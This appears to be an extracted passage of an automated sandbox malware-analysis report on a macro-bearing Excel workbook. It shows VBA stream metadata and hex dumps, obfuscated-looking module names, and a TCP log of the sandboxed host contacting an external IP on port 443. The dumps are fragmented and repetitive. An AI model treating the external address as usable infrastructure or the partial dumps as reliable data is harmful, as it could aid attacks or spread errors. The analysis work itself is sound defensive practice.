Stream Path: _VBA_PROJECT_CUR/PROJECT

File Type: ASCII text, with CRLF line terminators

Stream Size: 1424

Entropy: 5.32375715904


Data ASCII: I D = " { C 9 0 D 9 8 C E - 5 5 0 4 - 4 D 8 7 - A C 8 9 - 0 4 6 7 3 A 4 E 1 E 8 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a b u s e r s i m p u t a t i v e m i s g u g g l e . . M o d u l e = f i l i n g s c h o i c e n e s s e s f u n n e l i n g s y . . M o d u l e = c o u n t e r c l a i m

Data Raw: 49 44 3d 22 7b 43 39 30 44 39 38 43 45 2d 35 35 30 34 2d 34 44 38 37 2d 41 43 38 39 2d 30 34 36 37 33 41 34 45 31 45 38 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

General

Stream Path: _VBA_PROJECT_CUR/PROJECTwm

File Type: data

Stream Size: 1001

Entropy: 3.66930649648


Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 320

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 52696

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 1424

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 1001


Data ASCII: T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . a b u s e r s i m p u t a t i v e m i s g u g g l e . a . b . u . s . e . r . s . i . m . p . u . t . a . t . i . v . e . m . i . s . g . u . g . g . l . e . . . f i l i n g s c h o i c e n e s s e s f u n n e l i n g s y . f . i . l . i . n . g . s . c . h . o . i . c . e . n . e . s . s . e . s . f . u .

Data Raw: 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 61 62 75 73 65 72 73 69 6d 70 75 74 61 74 69 76 65 6d 69 73 67 75 67 67 6c 65

General

General

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT

File Type: data

Stream Size: 8464

Entropy: 5.03397938103


Data ASCII: . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 .0 . . . . . . W @ . . . . - . ~ / . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B. a . s . i . c .

Data Raw: cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 8b ce 82 d4 d5 57 40 c3 04 17 9d 2d b4 7e 2f bb 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

General

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0

File Type: data

Stream Size: 4241

Entropy: 3.64795104946


Data ASCII: . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . r U @ . . .

Data Raw: 93 4b 2a a6 03 00 20 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 00 00 05 00 00 00 00 00 01 00 02 00 05 00 00 00 00 00 01 00 00 00 06 00 00 00 00 00 01 00 02 00 06 00 00 00 00 00 01 00 00 00 07 00 00 00 00 00 01 00 02 00 07 00 00 00 00 00 01 00 00 00 08 00 00 00 00 00 01 00 02 00 08 00 00 00 00 00 01 00

General


File Type: data

Stream Size: 1176

Entropy: 3.7915801423


Data ASCII: r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . s t

Data Raw: 72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00

General


File Type: data

Stream Size: 306

Entropy: 2.17347444928


Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 8464

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 4241




Data ASCII: r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . a . . . . . . . . . . . " . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . a . . . . . . . . . . .. . . . . . . . . . . . . . . " . . . . . . . . . a . . . . . . .

Data Raw: 72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 11 00 10 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

General

General


File Type: data

Stream Size: 362

Entropy: 2.10998495002


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . .O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . .. . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 10 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 10 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

General


File Type: data

Stream Size: 171

Entropy: 1.66868613229


Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . " . . . . . .. . . a . . . . 0 . . . . . . . . . . . . . . .

Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 13 00 10 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00

General


File Type: data

Stream Size: 170

Entropy: 1.7675916358


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O. . . . . . . b . . . . . . . . . . . . . . .


General


File Type: data

Stream Size: 171

Entropy: 1.66868613229


Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . " . . . . . .. . . a . . . . 0 . . . . . . . . . . . . . . .







General

General


File Type: data

Stream Size: 170

Entropy: 1.7675916358


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O. . . . . . . b . . . . . . . . . . . . . . .


General


File Type: data

Stream Size: 171

Entropy: 1.66868613229


Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . " . . . . . .. . . a . . . . 0 . . . . . . . . . . . . . . .


General


File Type: data

Stream Size: 170

Entropy: 1.71872765488


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O. . . . . . . b . . . . . . . . . . . . . . .


General


File Type: data

Stream Size: 502

Entropy: 2.35925347469


Data ASCII: r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . " . . . . . . . . . a . . . . . . . . . . . . . . . . .. . . . . . . . . " . . . . . . . . . a . . . . . . . . . . . .






Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 618Copyright Joe Security LLC 2021 of 69

General


File Type: data

Stream Size: 618

Entropy: 2.20744408856


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O. @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . O . @ . . . . . .. . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . .


General


File Type: data

Stream Size: 171

Entropy: 1.68479658552


Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . " . . . . . .. . . a . . . . 0 . . . . . . . . . . . . . . .


General


File Type: data

Stream Size: 170

Entropy: 1.7675916358


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . .O . . . . . . . b . . . . . . . . . . . . . . .


General


File Type: data

Stream Size: 261

Entropy: 2.06288893904


Data ASCII: r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . .. . . . . . . . " . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . a . . . . . . . . . . . . . . . . . . . .. . . . . . " . . . . . . . . . a . . . . L . . . . . . . . . .


General


File Type: data

Stream Size: 298






Entropy: 2.0231102223


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O. @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . .. . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . .


General

General

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_a

File Type: data

Stream Size: 171

Entropy: 1.68479658552


Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . " . . . . . .. . . a . . . . 0 . . . . . . . . . . . . . . .

Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0b 00 10 00 00 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00

General

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_b

File Type: data

Stream Size: 170

Entropy: 1.75582692992


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O. . . . . . . b . . . . . . . . . . . . . . .

Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0a 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 0a 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

General

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_c

File Type: data

Stream Size: 170

Entropy: 1.63817063364


Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . .. . . Z . . . 2 . . . . . . . . . . . . . . .

Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0d 00 10 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00

General

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_d

File Type: data

Stream Size: 156

Entropy: 1.63365900945


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . .. . . . . . . .

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_a, File Type: data, Stream Size: 171

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_b, File Type: data, Stream Size: 170

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_c, File Type: data, Stream Size: 170

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_d, File Type: data, Stream Size: 156


Network Port Distribution

Total Packets: 38

Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0c 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

General

General

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_e

File Type: data

Stream Size: 208

Entropy: 1.90179293393


Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . .. " . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . a . . . . . . . . . . . .

Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0f 00 10 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0c 00

General

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_f

File Type: data

Stream Size: 234

Entropy: 1.95127834957


Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O. @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . . . . . . b . .. . . . . . . . . . . . .

Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0e 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

General

Stream Path: _VBA_PROJECT_CUR/VBA/dir

File Type: MIPSEB MIPS-III ECOFF executable not stripped - version 72.3

Stream Size: 1604

Entropy: 6.90291012299


Data ASCII: . @ . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r. . . . . . . . . k . . b 0 . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0. 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 DF 8 D 0 4 C . -

Data Raw: 01 40 b6 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 6b 1e a2 62 30 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_e, File Type: data, Stream Size: 208

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_f, File Type: data, Stream Size: 234

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: MIPSEB MIPS-III ECOFF executable not stripped - version72.3, Stream Size: 1604


• 53 (DNS)

• 443 (HTTPS)

Timestamp Source Port Dest Port Source IP Dest IP

May 26, 2021 08:37:44.247261047 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.300303936 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.300492048 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.307503939 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.360985041 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.361032009 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.361080885 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.361123085 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.361141920 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.361213923 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.361253023 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.361258984 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.366106033 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.366276979 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.378063917 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:44.433562040 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:44.433794022 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.420053959 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.513699055 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526562929 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526626110 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526659966 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526701927 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526741982 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526812077 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526844025 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526875019 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526882887 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.526913881 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526918888 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.526925087 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.526940107 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.526952028 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.526981115 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.526999950 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.530826092 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.579910994 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.579955101 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.579982042 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580009937 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580034971 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580059052 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580085993 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580102921 CEST 443 49167 109.169.78.226 192.168.2.22

TCP Packets


May 26, 2021 08:37:45.580121994 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580130100 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.580146074 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580163002 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580179930 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580193043 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.580199003 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580216885 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580231905 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580245018 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580256939 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580270052 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580272913 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.580281973 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580301046 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.580305099 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.580343962 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.580368042 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.580593109 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.583282948 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633559942 CEST 443 49167 109.169.78.226 192.168.2.22

